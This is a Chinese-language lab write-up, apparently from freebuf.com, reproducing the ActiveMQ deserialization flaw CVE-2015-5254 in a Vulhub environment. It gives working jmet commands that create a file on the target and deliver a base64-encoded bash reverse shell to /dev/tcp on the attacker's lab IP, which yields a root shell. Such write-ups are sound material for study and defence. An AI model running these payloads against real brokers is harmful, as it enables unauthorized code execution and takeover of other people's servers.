学习笔记之Vulhub漏洞系列:ActiveMQ 反序列化任意命令执行漏洞(CVE-2015-5254)复现 – 作者:wwyyss

前言

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

利用

工具下载:
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
kali :192.168.110.208
vulhub漏洞环境:192.168.110.213
首先进入jmet安装目录我这里安装在/opt下
远程创建文件:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/wys” -Yp ROME 192.168.110.213 61616
图片[1]-学习笔记之Vulhub漏洞系列:ActiveMQ 反序列化任意命令执行漏洞(CVE-2015-5254)复现 – 作者:wwyyss-安全小百科

此时会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://192.168.110.213:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息:

图片[2]-学习笔记之Vulhub漏洞系列:ActiveMQ 反序列化任意命令执行漏洞(CVE-2015-5254)复现 – 作者:wwyyss-安全小百科

点击查看相应的id号消息即可触发命令执行

图片[3]-学习笔记之Vulhub漏洞系列:ActiveMQ 反序列化任意命令执行漏洞(CVE-2015-5254)复现 – 作者:wwyyss-安全小百科

此时进入容器
docker-compose exec activemq bash
发现创建的文件
图片[4]-学习笔记之Vulhub漏洞系列:ActiveMQ 反序列化任意命令执行漏洞(CVE-2015-5254)复现 – 作者:wwyyss-安全小百科
kali弹shell:
将bash -i >& /dev/tcp/192.168.110.208/8888 0>&1 base64编码得到
YmFzaCAtaSA+JiAvZGV2L3RjcC8xO…….yMDgvODg4OCAwPiYxCg==
图片[5]-学习笔记之Vulhub漏洞系列:ActiveMQ 反序列化任意命令执行漏洞(CVE-2015-5254)复现 – 作者:wwyyss-安全小百科
payload如下:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8x…….MDgvODg4OCAwPiYxCg==}|{base64,-d}|{bash,-i}” -Yp ROME 192.168.110.213 61616
图片[6]-学习笔记之Vulhub漏洞系列:ActiveMQ 反序列化任意命令执行漏洞(CVE-2015-5254)复现 – 作者:wwyyss-安全小百科

kali监听,成功,拿到root权限

图片[7]-学习笔记之Vulhub漏洞系列:ActiveMQ 反序列化任意命令执行漏洞(CVE-2015-5254)复现 – 作者:wwyyss-安全小百科

来源:freebuf.com 2020-11-11 15:56:33 by: wwyyss

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论